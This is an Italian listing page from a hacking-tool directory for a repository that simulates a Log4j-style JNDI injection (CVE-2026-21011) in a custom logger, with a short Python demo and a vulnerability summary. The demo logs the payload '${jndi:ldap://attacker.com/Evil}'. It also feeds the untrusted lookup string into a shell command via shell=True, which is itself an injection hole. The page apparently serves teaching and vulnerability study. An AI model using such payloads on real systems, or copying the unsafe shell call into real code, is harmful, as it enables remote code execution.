Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated- — Simula la CVE-2026-21011, un'iniezione JNDI in stile Log4j in un logger personalizzato: analizza i pattern ${jndi:...} e dimostra l'esecuzione remota di codice attivata tramite LDAP. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubgeorge0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

Simula la CVE-2026-21011, un'iniezione JNDI in stile Log4j in un logger personalizzato: analizza i pattern ${jndi:...} e dimostra l'esecuzione remota di codice attivata tramite LDAP.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
16 giorni faNon ancora revisionato

CVE-2026-21011 – Iniezione JNDI in stile Log4j in Logger Personalizzato (Simulata)

Codice del Programma (simulazione Java in Python)

root@kitploit:~
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re

def log(message):
    # Vulnerable: looks up JNDI-like syntax and executes
    pattern = r'\$\{jndi:(.+?)\}'
    for match in re.finditer(pattern, message):
        lookup = match.group(1)
        if lookup.startswith('ldap://'):
            # Simulate connecting to LDAP and loading a class
            print(f"Loading malicious class from {lookup}")
            subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True)  # just demo

log("User-Agent: ${jndi:ldap://attacker.com/Evil}")

CVE-2026-21011 – Iniezione JNDI tramite Logger Personalizzato

Severity: Critical

Panoramica

Un framework di logging personalizzato valuta i pattern ${jndi:...} nei messaggi di log, in modo simile alla famigerata vulnerabilità LogShell. Un attaccante può iniettare una ricerca JNDI per caricare ed eseguire codice arbitrario da un server remoto.

Dettagli sulla vulnerabilità

  • Tipo: Iniezione di codice / Iniezione JNDI
  • Impatto: Esecuzione remota di codice.
  • Causa principale: Il logger analizza dati controllati dall'utente ed esegue lookup dinamici in base al contenuto.

Dimostrazione dell'exploit

Esegui la simulazione:

root@kitploit:~
python log4j_sim.py

Lo script stampa che caricherebbe una classe dal server LDAP dell'attaccante.

Scarica lo strumento